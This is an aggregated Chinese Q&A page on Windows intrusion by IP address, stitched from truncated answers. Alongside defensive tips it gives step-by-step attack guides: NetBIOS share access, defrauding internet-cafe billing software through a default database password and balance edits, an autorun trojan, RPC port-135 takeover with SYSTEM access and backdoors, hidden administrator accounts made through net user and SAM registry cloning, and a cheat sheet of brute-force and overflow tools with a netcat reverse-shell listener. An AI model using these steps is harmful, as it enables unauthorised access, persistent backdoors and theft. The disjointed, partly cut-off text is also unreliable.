win10怎么查远程侵入的IP

win10知道ip入侵电脑吗

1.知道了ip如何入侵电脑详细教程

只知道对方IP，你该这样入侵！黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。

其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。

现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法： 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。

对付上面进攻的最好办法就是隐藏你的IP地址。

2.电脑高手来嘛~~`我想在网吧给自己的卡冲值知道了网管的主机IP

利用万象给自己的会员加钱 大部分的入侵技术都是利用系统本身的漏洞进行的，而其中的关键就是人——网络管理员的素质，管理员的技术素质，工作态度在很大的程度上会左右系统的安全性能。

本文以万象网吧管理专家系统为例，描述笔者是如何破解万象网管软件的。 万象中最为重要的一个文件是名为“ b”数据库文件，他记录了万象的会员数据，有会员资料，会员卡号，余额等等的敏感数据如果这个文件一旦被用心不良的人截获并肆意修改，那后果是非常严重的。

所以这里提醒网吧管理员，必须保护好你的会员数据库。 下面是笔者重破解者的角度来描述整个破解过程，让你领会一次因配置适当而导致的严重漏洞。

一，前期工作 首先的问题就是我们如何接近数据库文件“ b”。这里我们简单的分析一下，现在的网吧一般不安装万象服务器版（收银端）在C盘，原因是担心系统出现问题丢失数据，大部分安装在C盘以外，例如安装在“D:\\\\OCTOPUS"。

所以我们要确定网吧的主机是那一台，安装了“OctPUS”的盘有没有共享？如果安装了“OctPUS”的盘没有共享，想办法让“ b”被共享，可能你觉得共享了“ b”的网吧不会有，但我觉得这样的网吧是用很多的，说不定你用的网吧就是，那你就……因为现在的网吧管理人员的水平也不是很高的。 即使有的网吧暂时$共享“ b”也不要灰心，有时候网吧人员变动，主机的设置也有可能变动，这时候也是有机会的…… 1,Autorun,inf文件的妙用 例如如果万象安装在D盘，而D盘没有共享，但是其他的盘例如E盘共享了，这样利用光盘自动运行程序的原理，在完全共享（例如E盘）的根目录建立一个“ f”文件，用记事本就可以进行了，文件保存后缀为INF。

内容如下 ： [autorun] open=木马的路径 这样当有人想打开E盘的时候木马就会自动运行了，这个方法很容易被别人发现，因为如果不删去“ f”文件，管理员双击就进不去E盘了，要进去的话还要用右键点击才能打开。 2，利用Vredir。

vxd文件偷梁换柱 你大部分遇到的网吧可能是D盘加密了的只读共享，在Win98下破解共享密码的方法很简单，因为在Win98共享目录密码校炼有BUG，只要将一个经过修改的Vredir。vxd文件COPY到WINDOWS\\\\SYSTEM目录覆盖源文件，重新启动电脑以后，你再进入有密码共享的目录，出现提示输入密码的窗口时不用输入密码，只要按住回车键不放就可以进去了！如果网吧安装了还原精灵，我们可以这样做，点击“关闭系统”，选择“重新启动计算机”，这时候按住Shift键不放，然后点击重新启动确定，就可以绕过还原精灵了！ 二，精彩部分 1，第一招——直捣黄龙 最幸运的情况就时你遇上了“OctPUS”目录被完全共享，而且网吧客户端安装了MicrosoftAccess，这时候入侵最简单了，用客户机MicrosoftAccess打开收银机的“ b”，这是提示输入密码，输入“alpha”确定后就会看见了，选择“打开数据库”确定后再输入一次“alpha”就可以看见图。

不要管他，点击确定后双击“userlist”就会看见什么了？会员的资料尽收眼底，“CARDID”下就时会员的卡号，“password”下就时密码，“remain”就时余下的金额，还有……里面的数据时可以直接修改的，你可以在你的用户名的金额后面加个0，呵呵！你甚至还可以进行新增会员，改变密码等操作。 2，第二招——伪装欺骗 首先去下载万象（下载地址是： 安装路径不要和客户机安装的路径相同，安装后千万不要运行，当然，如果你不幸运行了，在不足30秒的时间内，管理员就会站在你的身后……毛骨悚然……。

因为运行之后，“真”的服务端会有提示有另一个服务端在那一台电脑上运行。 所以我们要进行必要的设置，首先将“真”的服务器安装目录映射成本机的一个驱动器F盘。

然后打开本机控制面板的“ODBC数据原（32位）”。选择配置“Octopus”，然后在出现的对话框中选择“真”服务端的“ b”，点击“配置”，在出现的图象中选择“选取”。

然后在对话框中的数据原选择你映射在你自己电脑上的数据库，也就是主机的数据原，然后推出。这是俩个服务端就 共用一个同步的数据库了。

最后还要打开注册表编辑器，找到HKEY-LOCAL-MACHINE\\\\SOFT\\\\万象幻境\\\\”这个键。 先在“万象幻境”后新建一个主键“专家系列网管软件服务器”，服务端暂时未运行，所以这个键要自己添加，然后在“专家系列网管软件服务器”里面添加一个DWORD值，名称叫：LPORT，数据设为任意一个值，比如207。

关掉注册表就大公告成了，这时候打开本机的服务端，会弹出一个对话框，显示错误提示，我们不用管他，点击“确定”进入后，是看不到任何局域网的计算机的（这就是前面说的不可能反控的原因），但是可以对会员的数据库进行操作，二个数据库的操作是同步的，所以就可以对会员卡加钱了，呵呵！ 3，第三招—— 值得注意的是，第三招是我在没有实际操作的情况下在猜想的，所以请朋友千万不是以身使法！既然我们现在要做的仅仅是如何打开“ b”，而在同一个网络中用服务端打开会被发现，那么我们不可以在另外一个网络中通过服务端打开呢？？？我的猜想是。

3.知道IP和端口,怎样最简单的入侵到远程主机

通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call，远程过程调用)

协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码；

使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞，该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口，该接口侦听的端口就是135。

下面我就来介绍一下通过135端口入侵的方法。

(1)通过135端口入侵，攻击者首先需要查找网络上存在135端口漏洞的主机地址，在查找此类主机过程中，可以使用一些扫描工具，比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址，然后在“结束”文本框里填写好扫描结束的IP地址，在“扫描类型”选项中选择“所有端口定义”单选按钮，并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后，在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径，把里面有漏洞的IP整理下即可。

(2)得到有漏洞后，我们还有一个功能强大的扫描工具，比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径，在连接共享$处选择“WMI扫描”，在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。

(3)获得漏洞主机用户名以后，我们需要一个开启的工具，那就是Recton v2.5。好了，万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处，以及用户名和密码，不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车，会提示让你输入用户名，把用户名输入后，回车即可进入主机。而且得到的还是SYSTEM权限。

下一步就是为我们加了拥有管理员权限的用户，看看我杰作。最后我们可以上传一些远程性木马软件作为后门，比如灰鸽子，冰河等。在这里我就不在展示。我还是喜欢3389端口，那我就给他上传个开启3389的脚本，不过对于开启3389端口的工具网上还真的不少，比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样，就这么轻松得到了一台。是不是很过瘾啊。

Win10怎么反追踪黑客ip

1.我可以用哪些软件来进行反追踪啊(对黑客来说)我的电脑最近被一个

一般情况下，只要你不是固定IP的用户，黑客要追踪你肯定要在你的电脑上植入木马或者后门软件。

你可以在dos窗口中输入netstat -a 这条命令看看到底有那么些程序连接到你的电脑上面，开了那些端口出来等等情况。接下来你就可以通过杀毒软件、网络防火墙杀除木马后门，关闭打开的不必要的端口。

1024以后的端口正常情况下都不会开启的（不过4000和8000的端口除外，这个是QQ用端口，如果你不用QQ的话，开启了这两个端口也说明有问题了。） 再有的话，你也可以通过网上邻居属性-〉本地连接属性-〉TCP/IP协议属性-〉高级TCP/IP设置-〉选项-〉TCP/IP筛选属性里面，手动添加要开启的端口，关闭其他的网络端口来隔绝外网。

2.如何反黑客我的电脑让黑客介入了我很苦恼~如何防止黑客进入我的电

如何反黑客攻击 一、反攻击技术的核心问题 反攻击技术（入侵检测技术）的核心问题是如何截获所有的网络信息。

目前主要是通过两种途径来获取信息，一种是通过网络侦听的途径（如Sniffer,Vpacket等程序）来获取所有的网络信息（数据包信息，网络流量信息、网络状态信息、网络管理信息等），这既是黑客进行攻击的必然途径，也是进行反攻击的必要途径；另一种是通过对操作系统和应用程序的系统日志进行分析，来发现入侵行为和系统潜在的安全漏洞。 二、黑客攻击的主要方式 黑客对网络的攻击方式是多种多样的，一般来讲，攻击总是利用“系统配置的缺陷”，“操作系统的安全漏洞”或“通信协议的安全漏洞”来进行的。

到目前为止，已经发现的攻击方式超过2000种，其中对绝大部分黑客攻击手段已经有相应的解决方法，这些攻击大概可以划分为以下六类： 1。 拒绝服务攻击：一般情况下，拒绝服务攻击是通过使被攻击对象（通常是工作站或重要服务器）的系统关键资源过载，从而使被攻击对象停止部分或全部服务。

目前已知的拒绝服务攻击就有几百种，它是最基本的入侵攻击手段，也是最难对付的入侵攻击之一，典型示例有SYN Flood攻击、Ping Flood攻击、Land攻击、WinNuke攻击等。 2。

非授权访问尝试：是攻击者对被保护文件进行读、写或执行的尝试，也包括为获得被保护访问权限所做的尝试。 3。

预探测攻击：在连续的非授权访问尝试过程中，攻击者为了获得网络内部的信息及网络周围的信息，通常使用这种攻击尝试，典型示例包括SATAN扫描、端口扫描和IP半途扫描等。 4。

可疑活动：是通常定义的“标准”网络通信范畴之外的活动，也可以指网络上不希望有的活动，如IP Unknown Protocol和Duplicate IP Address事件等。 5。

协议解码：协议解码可用于以上任何一种非期望的方法中，网络或安全管理员需要进行解码工作，并获得相应的结果，解码后的协议信息可能表明期望的活动，如FTU User和Portmapper Proxy等解码方式。 6。

系统代理攻击：这种攻击通常是针对单个主机发起的，而并非整个网络，通过RealSecure系统代理可以对它们进行监视。 三、黑客攻击行为的特征分析与反攻击技术 入侵检测的最基本手段是采用模式匹配的方法来发现入侵攻击行为，要有效的进反攻击首先必须了解入侵的原理和工作机理，只有这样才能做到知己知彼，从而有效的防止入侵攻击行为的发生。

下面我们针对几种典型的入侵攻击进行分析，并提出相应的对策。 1。

Land攻击 攻击类型：Land攻击是一种拒绝服务攻击。 攻击特征：用于Land攻击的数据包中的源地址和目标地址是相同的，因为当操作系统接收到这类数据包时，不知道该如何处理堆栈中通信源地址和目的地址相同的这种情况，或者循环发送和接收该数据包，消耗大量的系统资源，从而有可能造成系统崩溃或死机等现象。

检测方法：判断网络数据包的源地址和目标地址是否相同。 反攻击方法：适当配置防火墙设备或过滤路由器的过滤规则就可以防止这种攻击行为（一般是丢弃该数据包），并对这种攻击进行审计（记录事件发生的时间，源主机和目标主机的MAC地址和IP地址）。

2。TCP SYN攻击 攻击类型：TCP SYN攻击是一种拒绝服务攻击。

攻击特征：它是利用TCP客户机与服务器之间三次握手过程的缺陷来进行的。攻击者通过伪造源IP地址向被攻击者发送大量的SYN数据包，当被攻击主机接收到大量的SYN数据包时，需要使用大量的缓存来处理这些连接，并将SYN ACK数据包发送回错误的IP地址，并一直等待ACK数据包的回应，最终导致缓存用完，不能再处理其它合法的SYN连接，即不能对外提供正常服务。

检测方法：检查单位时间内收到的SYN连接否收超过系统设定的值。 反攻击方法：当接收到大量的SYN数据包时，通知防火墙阻断连接请求或丢弃这些数据包，并进行系统审计。

3。Ping Of Death攻击 攻击类型：Ping Of Death攻击是一种拒绝服务攻击。

攻击特征：该攻击数据包大于65535个字节。由于部分操作系统接收到长度大于65535字节的数据包时，就会造成内存溢出、系统崩溃、重启、内核失败等后果，从而达到攻击的目的。

检测方法：判断数据包的大小是否大于65535个字节。 反攻击方法：使用新的补丁程序，当收到大于65535个字节的数据包时，丢弃该数据包，并进行系统审计。

4。WinNuke攻击 攻击类型：WinNuke攻击是一种拒绝服务攻击。

攻击特征：WinNuke攻击又称带外传输攻击，它的特征是攻击目标端口，被攻击的目标端口通常是139、138、137、113、53，而且URG位设为“1”，即紧急模式。 检测方法：判断数据包目标端口是否为139、138、137等，并判断URG位是否为“1”。

反攻击方法：适当配置防火墙设备或过滤路由器就可以防止这种攻击手段（丢弃该数据包），并对这种攻击进行审计（记录事件发生的时间，源主机和目标主机的MAC地址和IP地址MAC）。 5。

Teardrop攻击 攻击类型：Teardrop攻击是一种拒绝服务攻击。 攻击特征：Teardrop是基于UDP的病态分片数据包的攻击方法，其工作原理是向被攻击者发送多个分片的IP包（IP分片数。

3.如何为一台机器分配多个IP地址为了反跟踪,我需要将我的电脑设定一

一般情况下，一个网卡只能绑定一个IP地址，但在Win98中，我们可以通过修改系统注册表，让一个网卡绑定多个IP地址。

具体操作如下：运行注册表编辑器（Regedit），依次打开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class \NetTrans的主键分支。在主键中可以看到名为0000、0001、0002等一系列子键，它们用于记录协议的安装情况。

在它们中间找到DriverDesc的值为“TCP/IP”的主键，修改IPAddress和IPMask两个键。其中IPAddress为用逗号隔开的多个IP地址，IPMask是对应的掩码。

如设置IPAddress为“ ， ”，IPMask为“ ， ”时，你就可以得到 和 两个IP地址。

4.如何去全程追踪入侵JSP网站服务器

入侵测试第一步：扫描 扫描是入侵的第一步，它可以让你对即将入侵的目标有一个全面的了解。

同时扫描还有可能发现扫描对象的漏洞，为入侵提供一个指导方向。 朋友的两台服务器为Linux，一台为Windows系统，在路由器后面还有一台Cisco PIX 525对三台主机进行保护，只允许外部用户连接不同主机的部分端口，例如80,25,110。

根据检测，Cisco PIX防火墙过滤规则设置比较严密，基本上没有多余端口允许外部用户访问。细致分析后，我发现，目标网络的主机通过地址转换来提供对外访问，内部使用192。

168。*。

*地址段。 先不考虑那么多，找个扫描软件来看看主机的安全情况。

我找来了X-Scan，在外部对这几台主机进行了端口扫描之后，生成了一份关于端口的报表，发现其中有一个Tomcat服务器，解释的自然就是JSP文件了。小知识： Tomcat Web服务器是一款开源的适合于各种平台的免费网络服务器。

eBay。com与Dell 计算机等知名网站都采用或者曾经采用Tomcat的container容器执行Servlet 与JSP。

看来，只能通过Web服务进行间接攻击。首先检查TCP 80端口的服务。

我发现，新闻搜索的功能是由端口8080提供的，输入http:// 202。103。

*。168:8080/之后，得到了一个系统管理登录页面，简单地测试了一下，输入“test/test”作为“用户名/口令”，似乎认证成功，但实际上并不能进入下一个页面。

专家支招：对于扫描来说，它很容易暴露我们网站的弱势方面。应对扫描，我们可以架设一个蜜罐来误导扫描者，蜜罐可以让系统伪装成到处是漏洞，从而遮蔽真正存在的漏洞，也可以伪装成没有任何漏洞，让入侵者不知道从何入手。

入侵测试第二步：漏洞尝试 尝试JSP各种已知漏洞，这个是在扫描结果中无法获得任何有效信息指导入侵的情况下，被迫使用的方法。 这种方法虽然效果不一定好，但是往往能够起到意想不到的效果，从而让入侵继续下去。

我进行了JSP大小写的测试，因为JSP对大小写是敏感的，Tomcat只会将小写的jsp后缀的文件当作是正常的JSP文件来执行，如果大写了就会引起Tomcat将index。 JSP当作是一个可以下载的文件让客户下载，若干测试后，我发现这个方法并不奏效，可能管理员已经在服务器软件的网站上下载了最新的补丁。

我发现大部分的JSP应用程序在当前目录下都会有一个WEB-INF目录，这个目录通常存放的是JavaBeans编译后的class 文件，如果不给这个目录设置正常的权限，所有的class就会曝光。 而采用JAD软件对下载的class文件反编译后，原始的Java文件甚至变量名都不会改变。

如果网页制作者开始把数据库的用户名密码都写在了Java代码中，反编译后，说不定还能看到数据库的重要信息。那么，怎么得到这些文件呢？ Tomcat版本的缺省“/admin”目录是很容易访问的。

输入：http://202。103。

*。168/admin/，管理员目录赫然在列。

默认情况下，“User Name”应该是admin,“Password”应该是空，输入用户和密码后，并点击“Login”按钮，不能进入，陆续使用了几个比较常见的密码，也无济于事。 默认情况下，Tomcat打开了目录浏览功能，而一般的管理员又很容易忽视这个问题。

也就是说，当要求的资源直接映射到服务器上的一个目录时，由于在目录中缺少缺省的index。jsp等文件，Tomcat将不返回找不到资源的404错误，而是返回HTML格式的目录列表。

想到了这点后，我打开刚才用X-Scan扫描后生成的报表文件，找到“安全漏洞及解决方案”栏目，看到了几个可能会有CGI漏洞的目录。

5.计算机被黑客攻击,如何反向追踪IP原始攻击地址

首先，我们需要给电脑安装一款ARP防火墙，在此小编推荐大家使用“360安全卫士”所提供的“流量防火墙”功能。

在“360安全卫士”更多功能列表中找到“流量防火墙”项点击进入。首次使用时，会提示是否开启“流量防火墙”，直接点击“立即开启”按钮。

在其主界面中，点击“详情/设置”按钮。然后在弹出的“添加保护网关IP/MAC”窗口中，点击“添加网关”按钮。

接着输入网关IP地址和MAC地址，完成网关的绑定操作。经过以上设置之后，“360流量防火墙”就在后台自动运行啦。

当自己的电脑受到ARP断网攻击时，任务栏处会显示相应的提示，点击“详情”按钮。在弹出的窗口中，就会显示“已成功拦截ARP”，此时点击“追踪攻击者IP”按钮。

此时就可以找到攻击者电脑IP地址信息啦，相应的我们可以采取隔离或杀毒措施。另外，我们还可以利用“聚生网管”来查看可能存在的ARP攻击。

直接在百度中搜索“聚生网管”，就可以看到下载地址。在程序主界面中，勾选“安全警报选项”栏目中的“发现ARP攻击时报警”项。

最后点击“启用监控”按钮，就可以查看并确定ARP攻击源啦。

win10怎么防止侵入

1.如何防止黑客侵入你正在使用的Windows系统?

当黑客入侵一台主机后，会想方设法保护自己的“劳动成果”，因此会在肉鸡上留下种种后门来长时间得控制肉鸡，其中使用最多的就是账户隐藏技术。

在肉鸡上建立一个隐藏的账户，以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门，一般用户很难发现系统中隐藏账户的存在，因此危害性很大，本文就对隐藏账户这种黑客常用的技术进行揭密。

在隐藏系统账户之前，我们有必要先来了解一下如何才能查看系统中已经存在的账户。在系统中可以进入“命令提示符”，控制面板的“计算机管理”，“注册表”中对存在的账户进行查看，而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常，因此如何让系统账户在这两者中隐藏将是本文的重点。

一、“命令提示符”中的阴谋 其实，制作系统隐藏账户并不是十分高深的技术，利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。 点击“开始”→“运行”，输入“CMD”运行“命令提示符”，输入“net user piao$ 123456 /add”，回车，成功后会显示“命令成功完成”。

接着输入“net localgroup administrators piao$ /add”回车，这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”，密码为“123456”的简单“隐藏账户”，并且把该隐藏账户提升为了管理员权限。 我们来看看隐藏账户的建立是否成功。

在“命令提示符”中输入查看系统账户的命令“net user”，回车后会显示当前系统中存在的账户。从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。

接着让我们进入控制面板的“管理工具”，打开其中的“计算机”，查看其中的“本地用户和组”，在“用户”一项中，我们建立的隐藏账户“piao$”暴露无疑。 可以总结得出的结论是：这种方法只能将账户在“命令提示符”中进行隐藏，而对于“计算机管理”则无能为力。

因此这种隐藏账户的方法并不是很实用，只对那些粗心的管理员有效，是一种入门级的系统账户隐藏技术。 二、在“注册表”中玩转账户隐藏 从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显，很容易暴露自己。

那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢？答案是肯定的，而这一切只需要我们在“注册表”中进行一番小小的设置，就可以让系统账户在两者中完全蒸发。 1、峰回路转，给管理员注册表操作权限 在注册表中对系统账户的键值进行操作，需要到“HKEY_LOCAL_MACHINE\SAM\SAM”处进行修改，但是当我们来到该处时，会发现无法展开该处所在的键值。

这是因为系统默认对系统管理员给予“写入D AC”和“读取控制”权限，没有给予修改权限，因此我们没有办法对“SAM”项下的键值进行查看和修改。不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。

点击“开始”→“运行”，输入“regedt32.exe”后回车，随后会弹出另一个“注册表编辑器”，和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限（为便于理解，以下简称regedt32.exe）。在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处，点击“安全”菜单→“权限”，在弹出的“SAM的权限”编辑窗口中选中“administrators”账户，在下方的权限设置处勾选“完全控制”，完成后点击“确定”即可。

然后我们切换回“注册表编辑器”，可以发现“HKEY_LOCAL_MACHINE\SAM\SAM”下面的键值都可以展开了。 提示：上文中提到的方法只适用于Windows NT/2000系统。

在Windows XP系统中，对于权限的操作可以直接在注册表中进行，方法为选中需要设置权限的项，点击右键，选择“权限”即可。 2、偷梁换柱，将隐藏账户替换为管理员 成功得到注册表操作权限后，我们就可以正式开始隐藏账户的制作了。

来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处，当前系统中所有存在的账户都会在这里显示，当然包括我们的隐藏账户。点击我们的隐藏账户“piao$”，在右边显示的键值中的“类型”一项显示为0x3e9，向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处，可以找到“000003E9”这一项，这两者是相互对应的，隐藏账户“piao$”的所有信息都在“000003E9”这一项中。

同样的，我们可以找到“administrator”账户所对应的项为“000001F4”。 将“piao$”的键值导出为piao$.reg，同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg,admin.reg。

用“记事本”打开admin.reg，将其中“F”值后面的内容复制下来，替换user.reg中的“F”值内容，完成后保存。接下来进入“命令提示符”，输入“net user piao$ /del”将我们建立的隐藏账户删除。

最后，将piao$.reg和user.reg导入注册表，至此，隐藏账户制作完成。 3、过河拆桥，切断删除隐藏账户的途径 虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了，但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户，那么如。

2.Win10电脑如何防止黑客攻击

Win10电脑防止黑客攻击要做到以下几点

1.确保防火墙，安全卫士，杀毒软件等开启，并正确设置参数。

2.浏览安全类的平时常用网站，不要浏览一些不健康的网站。浏览网站时，弹窗类广告尽量不要去点击它，或者可以设置阻止弹窗。

3.下载东西尽量从官网正常渠道下载，而且对下载的文件，软件进行安全检查。

4.不要安装未知程序和软件，不要随意打开或下载网络上不认识的人发过来的QQ文件或邮箱文件。

5.经常性进行查毒杀毒，并升级病毒库到最新版本。

3.怎么防止别人侵入俺的电脑啊!!!?

默认情况下，Windows有很多端口是开放的，在你上网的时候，网络病毒和黑客可以通过这些端口连上你的电脑。

为了让你的系统变为铜墙铁壁，应该封闭这些端口，主要有：TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口，一些流行病毒的后门端口（如 TCP 2745、3127、6129 端口），以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口：

第一步，在“运行”输入gpedit.msc，回车打开“组策略”，在组策略中的windows设置-安全设置中选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建 IP 安全策略”，于是弹出一个向导。在向导中点击“下一步”按钮，为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。

第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，弹出IP筛选器列表窗口；在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。

第三步，进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何 IP 地址”，目标地址选“我的 IP 地址”；点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输入“135”，点击“确定”按钮，这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器，它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框，可以看到已经添加了一条策略，重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口，为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略，建立好上述端口的筛选器，最后点击“确定”按钮。

第四步，在“新规则属性”对话框中，选择“新 IP 筛选器列表”，然后点击其左边的圆圈上加一个点，表示已经激活，最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中，把“使用添加向导”左边的钩去掉，点击“添加”按钮，添加“阻止”操作：在“新筛选器操作属性”的“安全措施”选项卡中，选择“阻止”，然后点击“确定”按钮。

第五步，进入“新规则属性”对话框，点击“新筛选器操作”，其左边的圆圈会加了一个点，表示已经激活，点击“关闭”按钮，关闭对话框；最后回到“新IP安全策略属性”对话框，在“新的IP筛选器列表”左边打钩，按“确定”按钮关闭对话框。在“本地安全策略”窗口，用鼠标右击新添加的 IP 安全策略，然后选择“指派”。

于是重新启动后，电脑中上述网络端口就被关闭了，病毒和黑客再也不能连上这些端口，从而保护了你的电脑。目前还没听说有补丁下载。

4.怎样防止黑客入侵电脑 九个设置让电脑远离黑客

让电脑远离黑客，可以用杀毒软件和安全卫士。

电脑病毒是指编制者在电脑程序中插入的破坏电脑功能或者破坏数据的，影响电脑使用并且能够自我复制的一组电脑指令或程序代码。与生物中的病毒不一样，电脑病毒不是天然存在的，是某些人利用电脑软件和硬件固有的脆弱性编制的一组指令集或程序代码。它能通过某种途径潜伏在电脑的存储介质里，当达到某种条件时被激活，通过修改其它程序的方法把恶意代码或程序放入其它程序中，从而感染这些程序。如“熊猫烧香”是病毒的典型代表。

现在已经发现并正式命名的电脑病毒有几百种，如耶路撒冷、巴基斯坦智囊、维也纳、冰岛人、大麻、磁盘杀手、快乐的星期天、小球、疯狂拷贝、下雨、音乐、1505、1704、648、405。

电脑病毒按其产生的后果分为良性病毒和恶性病毒。良性病毒发作时不破坏系统数据，只占用系统资源的病毒，一般只是占用电脑资源，产生一些无所谓的消耗，或干扰机器的运行，如小球病毒。恶性病毒一旦发作便会破坏数据或系统的病毒，如大麻病毒等。

以病毒的寄生方式分类，可以分为操作系统型病毒、外壳病毒、入侵病毒和源码病毒。

操作系统型病毒——运行时，用自己的逻辑部分取代部分操作系统的程序模块，如大麻病毒、磁盘杀手等。

外壳病毒——把病毒自身包围在主程序的四周，对原来的程序不做修改，在运行主程序时，病毒首先进入内存。如耶路撒冷、维也纳、快乐的星期天等。

入侵病毒——侵入到现有程序之中，实际上把病毒插入到主程序中去。

源码病毒——在程序被编译之前插入到一些编程语言编写的程序中。

电脑病毒的传染途径通常有三种：软盘的互换使用、硬盘的感染和电脑网络的传染。

电脑病毒主要寄生在磁盘的引导扇区、可执行文件、硬盘的主引导扇区中。

电脑感染了病毒后，程序装入的时间比平时长很多，可执行程序的长度增加，磁盘访问的时间比平时长，有异常的磁盘访问，有规律地发现异常信息，可用系统空间不断变小，磁盘的不可用数增多，数据和程序丢失，打印时出现问题，频繁死机，磁盘的卷名发生了变化，使用关闭写保护的软盘时屏幕上出现软盘写保护的信息，异常要求输入口令，机器发出怪叫声，command.com、autoexec.bat、config.sys等文件已经被修改，出现异常的隐含文件。

电脑一旦染上了病毒就必须予以清除。杀毒软件也叫做反病毒软件和防毒软件，是用于消除电脑病毒、特洛伊木马和恶意软件的一类软件。杀毒软件通常集成监控识别、病毒扫描清除和自动升级等功能，有的杀毒软件还带有数据恢复等功能，是电脑防御系统的重要组成部分。

主流的杀毒软件有360、金山毒霸、瑞星杀毒软件等，集合了杀毒、防毒、实时监控和防火墙功能。

360杀毒软件的主界面，简洁大方，功能列表一目了然，单击【快速扫描】按钮，进入查杀状态。

杀毒结束后，会给出杀毒报告，根据提示进行相应的操作。

杀毒的基本原理是把磁盘上的文件与病毒库里的病毒特征进行对比，在满足特点后认定为病毒，杀毒软件默认进行杀毒操作，并把病毒进行隔离。

杀毒软件处于启用状态，在状态栏的右端显示有小图标，右击这个图标，会给出相应快捷菜单列表，可以根据需要有针对性地启用杀毒功能。

发现病毒越早越好。能够在病毒产生危害之前发现和排除它，可以使系统免受危害。能够在病毒广泛传播之前发现它，可以使系统修复的任务较轻，较容易。病毒在系统内存在的时间越长，产生的危害就越大。

5.如何防止别人入侵计算机

开启防火墙，关闭一些常用来入侵的端口，如3389

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵

=============================

对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵

对很早的机器，可以试试3389的溢出（win3389ex.exe）

对2000的机器，可以试试字典暴破。（tscrack.exe）

4. 80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL进行注入。（小榕的注入软件）。

5. serv-u入侵（21端口）

对5. 004及以下系统，可用溢出入侵。（serv5004.exe）

对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

======================================

对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）

